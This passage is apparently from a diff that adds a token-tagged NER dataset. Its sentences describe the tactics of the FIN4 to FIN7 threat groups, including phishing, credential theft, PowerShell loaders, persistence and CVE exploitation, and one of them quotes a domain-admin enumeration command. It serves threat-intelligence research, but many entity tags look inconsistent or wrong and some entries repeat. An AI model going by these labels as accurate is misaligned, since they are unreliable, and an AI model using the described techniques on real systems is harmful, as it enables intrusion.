"FIN4", + "has", + "used", + "Tor", + "to", + "log", + "in", + "to", + "victims'", + "email", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN4", + "has", + "accessed", + "and", + "hijacked", + "online", + "email", + "communications", + "using", + "stolen", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "FIN4", + "has", + "used", + "spearphishing", + "emails", + "containing", + "attachments", + "(which", + "are", + "often", + "stolen,", + "legitimate", + "documents", + "sent", + "from", + "compromised", + "accounts)", + "with", + "embedded", + "malicious", + "macros." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN4", + "has", + "used", + "spearphishing", + "emails", + "(often", + "sent", + "from", + "compromised", + "accounts)", + "containing", + "malicious", + "links." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN4", + "has", + "used", + "legitimate", + "credentials", + "to", + "hijack", + "email", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN4", + "has", + "used", + "VBA", + "macros", + "to", + "display", + "a", + "dialog", + "box", + "and", + "collect", + "victim", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN4", + "has", + "used", + "HTTP", + "POST", + "requests", + "to", + "transmit", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN5", + "scans", + "processes", + "on", + "all", + "victim", + "systems", + "in", + "the", + "environment", + "and", + "uses", + "automated", + "scripts", + "to", + "pull", + "back", + "the", + "results." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN5", + "has", + "has", + "used", + "the", + "tool", + "GET2", + "Penetrator", + "to", + "look", + "for", + "remote", + "login", + "and", + "hard-coded", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN5", + "has", + "cleared", + "event", + "logs", + "from", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN5", + "scans", + "processes", + "on", + "all", + "victim", + "systems", + "in", + "the", + "environment", + "and", + "uses", + "automated", + "scripts", + "to", + "pull", + "back", + "the", + "results." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN5", + "maintains", + "access", + "to", + "victim", + "environments", + "by", + "using", + "FLIPSIDE", + "to", + "create", + "a", + "proxy", + "for", + "a", + "backup", + "RDP", + "tunnel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "FIN5", + "has", + "used", + "legitimate", + "VPN,", + "Citrix,", + "or", + "VNC", + "credentials", + "to", + "maintain", + "access", + "to", + "a", + "victim", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN5", + "uses", + "SDelete", + "to", + "clean", + "up", + "the", + "environment", + "and", + "attempt", + "to", + "prevent", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN5", + "scripts", + "save", + "memory", + "dump", + "data", + "into", + "a", + "specific", + "directory", + "on", + "hosts", + "in", + "the", + "victim", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN5", + "has", + "used", + "the", + "open", + "source", + "tool", + "Essential", + "NetTools", + "to", + "map", + "the", + "network", + "and", + "build", + "a", + "list", + "of", + "targets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN5", + "has", + "obtained", + "and", + "used", + "a", + "customized", + "version", + "of", + "PsExec,", + "as", + "well", + "as", + "use", + "other", + "tools", + "such", + "as", + "pwdump,", + "SDelete,", + "and", + "Windows", + "Credential", + "Editor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "FIN5", + "has", + "used", + "legitimate", + "VPN,", + "RDP,", + "Citrix,", + "or", + "VNC", + "credentials", + "to", + "maintain", + "access", + "to", + "a", + "victim", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "has", + "used", + "Metasploit’s", + "named-pipe", + "impersonation", + "technique", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Following", + "data", + "collection,", + "FIN6", + "has", + "compressed", + "log", + "files", + "into", + "a", + "ZIP", + "archive", + "prior", + "to", + "staging", + "and", + "exfiltration." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "encoded", + "data", + "gathered", + "from", + "the", + "victim", + "with", + "a", + "simple", + "substitution", + "cipher", + "and", + "single-byte", + "XOR", + "using", + "the", + "0xAA", + "key,", + "and", + "Base64", + "with", + "character", + "permutation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "used", + "the", + "Plink", + "command-line", + "utility", + "to", + "create", + "SSH", + "tunnels", + "to", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "a", + "script", + "to", + "iterate", + "through", + "a", + "list", + "of", + "compromised", + "PoS", + "systems,", + "copy", + "and", + "remove", + "data", + "to", + "a", + "log", + "file,", + "and", + "to", + "bind", + "to", + "events", + "from", + "the", + "submit", + "payment", + "button." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "Comodo", + "code-signing", + "certificates." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "encoded", + "PowerShell", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "scripting", + "to", + "iterate", + "through", + "a", + "list", + "of", + "compromised", + "PoS", + "systems,", + "copy", + "data", + "to", + "a", + "log", + "file,", + "and", + "remove", + "the", + "original", + "data", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "the", + "Stealer", + "One", + "credential", + "stealer", + "to", + "target", + "e-mail", + "and", + "file", + "transfer", + "utilities", + "including", + "FTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Org", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "the", + "Stealer", + "One", + "credential", + "stealer", + "to", + "target", + "web", + "browsers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "collected", + "schemas", + "and", + "user", + "accounts", + "from", + "systems", + "running", + "SQL", + "Server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "collected", + "and", + "exfiltrated", + "payment", + "card", + "data", + "from", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Purp", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "deployed", + "a", + "utility", + "script", + "named", + "<code>kill.bat</code>", + "to", + "disable", + "anti-virus." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "Metasploit’s", + "PsExec", + "NTDSGRAB", + "module", + "to", + "obtain", + "a", + "copy", + "of", + "the", + "victim's", + "Active", + "Directory", + "database." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "sent", + "stolen", + "payment", + "card", + "data", + "to", + "remote", + "servers", + "via", + "HTTP", + "POSTs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "tools", + "to", + "exploit", + "Windows", + "vulnerabilities", + "in", + "order", + "to", + "escalate", + "privileges.", + "The", + "tools", + "targeted", + "CVE-2013-3660,", + "CVE-2011-2005,", + "and", + "CVE-2010-4398,", + "all", + "of", + "which", + "could", + "allow", + "local", + "users", + "to", + "access", + "kernel-level", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "removed", + "files", + "from", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "malicious", + "JavaScript", + "to", + "steal", + "payment", + "card", + "data", + "from", + "e-commerce", + "sites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "Windows", + "Credential", + "Editor", + "for", + "credential", + "dumping." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "malicious", + "documents", + "to", + "lure", + "victims", + "into", + "allowing", + "execution", + "of", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "renamed", + "the", + "\"psexec\"", + "service", + "name", + "to", + "\"mstdc\"", + "to", + "masquerade", + "as", + "a", + "legitimate", + "Windows", + "service." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "Metasploit’s", + "PsExec", + "NTDSGRAB", + "module", + "to", + "obtain", + "a", + "copy", + "of", + "the", + "victim's", + "Active", + "Directory", + "database." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "used", + "publicly", + "available", + "tools", + "(including", + "Microsoft's", + "built-in", + "SQL", + "querying", + "tool,", + "osql.exe)", + "to", + "map", + "the", + "internal", + "network", + "and", + "conduct", + "reconnaissance", + "against", + "Active", + "Directory,", + "Structured", + "Query", + "Language", + "(SQL)", + "servers,", + "and", + "NetBIOS." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "Metasploit", + "Bind", + "and", + "Reverse", + "TCP", + "stagers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "extracted", + "password", + "hashes", + "from", + "ntds.dit", + "to", + "crack", + "offline." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "PowerShell", + "to", + "gain", + "access", + "to", + "merchant's", + "networks,", + "and", + "a", + "Metasploit", + "PowerShell", + "module", + "to", + "download", + "and", + "execute", + "shellcode", + "and", + "to", + "set", + "up", + "a", + "local", + "listener." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "B-Purp", + "O", + "B-Purp", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "used", + "the", + "Plink", + "command-line", + "utility", + "to", + "create", + "SSH", + "tunnels", + "to", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "Registry", + "Run", + "keys", + "to", + "establish", + "persistence", + "for", + "its", + "downloader", + "tools", + "known", + "as", + "HARDTACK", + "and", + "SHIPBREAD." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "FIN6", + "actors", + "have", + "compressed", + "data", + "from", + "remote", + "systems", + "and", + "moved", + "it", + "to", + "another", + "staging", + "system", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "used", + "RDP", + "to", + "move", + "laterally", + "in", + "victim", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "used", + "publicly", + "available", + "tools", + "(including", + "Microsoft's", + "built-in", + "SQL", + "querying", + "tool,", + "osql.exe)", + "to", + "map", + "the", + "internal", + "network", + "and", + "conduct", + "reconnaissance", + "against", + "Active", + "Directory,", + "Structured", + "Query", + "Language", + "(SQL)", + "servers,", + "and", + "NetBIOS." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "scheduled", + "tasks", + "to", + "establish", + "persistence", + "for", + "various", + "malware", + "it", + "uses,", + "including", + "downloaders", + "known", + "as", + "HARDTACK", + "and", + "SHIPBREAD", + "and", + "FrameworkPOS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "created", + "Windows", + "services", + "to", + "execute", + "encoded", + "PowerShell", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "targeted", + "victims", + "with", + "e-mails", + "containing", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "fake", + "job", + "advertisements", + "sent", + "via", + "LinkedIn", + "to", + "spearphish", + "targets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Mimikatz,", + "Cobalt", + "Strike,", + "and", + "AdFind." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "To", + "move", + "laterally", + "on", + "a", + "victim", + "network,", + "FIN6", + "has", + "used", + "credentials", + "stolen", + "from", + "various", + "systems", + "on", + "which", + "it", + "gathered", + "usernames", + "and", + "password", + "hashes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "Pastebin", + "and", + "Google", + "Storage", + "to", + "host", + "content", + "for", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "<code>kill.bat</code>", + "script", + "to", + "disable", + "security", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN6", + "has", + "used", + "WMI", + "to", + "automate", + "the", + "remote", + "execution", + "of", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "application", + "shim", + "databases", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "used", + "legitimate", + "services", + "like", + "Google", + "Docs,", + "Google", + "Scripts,", + "and", + "Pastebin", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "random", + "junk", + "code", + "to", + "obfuscate", + "malware", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "signed", + "Carbanak", + "payloads", + "with", + "legally", + "purchased", + "code", + "signing", + "certificates.", + "FIN7", + "has", + "also", + "digitally", + "signed", + "their", + "phishing", + "documents,", + "backdoors", + "and", + "other", + "staging", + "tools", + "to", + "bypass", + "security", + "controls." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "fragmented", + "strings,", + "environment", + "variables,", + "standard", + "input", + "(stdin),", + "and", + "native", + "character-replacement", + "functionalities", + "to", + "obfuscate", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "I-Tool", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "used", + "SQL", + "scripts", + "to", + "help", + "perform", + "tasks", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "gained", + "initial", + "access", + "by", + "compromising", + "a", + "victim's", + "software", + "supply", + "chain." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "performed", + "C2", + "using", + "DNS", + "via", + "A,", + "OPT,", + "and", + "TXT", + "records." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "encrypted", + "virtual", + "disk", + "volumes", + "on", + "ESXi", + "servers", + "using", + "a", + "version", + "of", + "Darkside", + "ransomware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "collected", + "files", + "and", + "other", + "sensitive", + "information", + "from", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "the", + "command", + "`net", + "group", + "\"domain", + "admins\"", + "/domain`", + "to", + "enumerate", + "domain", + "groups." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "registered", + "look-alike", + "domains", + "for", + "use", + "in", + "phishing", + "campaigns." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "compromised", + "a", + "digital", + "product", + "website", + "and", + "modified", + "multiple", + "download", + "links", + "to", + "point", + "to", + "trojanized", + "versions", + "of", + "offered", + "digital", + "products." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "spear", + "phishing", + "campaigns", + "have", + "included", + "malicious", + "Word", + "documents", + "with", + "DDE", + "execution." + ], + "ner_tags": [ + "B-Idus", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "exfiltrated", + "stolen", + "data", + "to", + "the", + "MEGA", + "file", + "sharing", + "site." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "compromised", + "targeted", + "organizations", + "through", + "exploitation", + "of", + "CVE-2021-31207", + "in", + "Exchange." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "exploited", + "ZeroLogon", + "(CVE-2020-1472)", + "against", + "vulnerable", + "domain", + "controllers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7's", + "Harpy", + "backdoor", + "malware", + "can", + "use", + "DNS", + "as", + "a", + "backup", + "channel", + "for", + "C2", + "if", + "HTTP", + "fails." + ], + "ner_tags": [ + "B-Idus", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "downloaded", + "additional", + "malware", + "to", + "execute", + "on", + "the", + "victim's", + "machine,", + "including", + "by", + "using", + "a", + "PowerShell", + "script", + "to", + "launch", + "shellcode", + "that", + "retrieves", + "an", + "additional", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "used", + "JavaScript", + "scripts", + "to", + "help", + "perform", + "tasks", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "Kerberoasting", + "PowerShell", + "commands", + "such", + "as,", + "`Invoke-Kerberoast`", + "for", + "credential", + "access", + "and", + "to", + "enable", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "compromised", + "credentials", + "for", + "access", + "as", + "SYSTEM", + "on", + "Exchange", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "lured", + "victims", + "to", + "double-click", + "on", + "images", + "in", + "the", + "attachments", + "they", + "sent", + "which", + "would", + "then", + "execute", + "the", + "hidden", + "LNK", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "malicious", + "links", + "to", + "lure", + "victims", + "into", + "downloading", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "developed", + "malware", + "for", + "use", + "in", + "operations,", + "including", + "the", + "creation", + "of", + "infected", + "removable", + "media." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "created", + "a", + "scheduled", + "task", + "named", + "“AdobeFlashSync”", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + 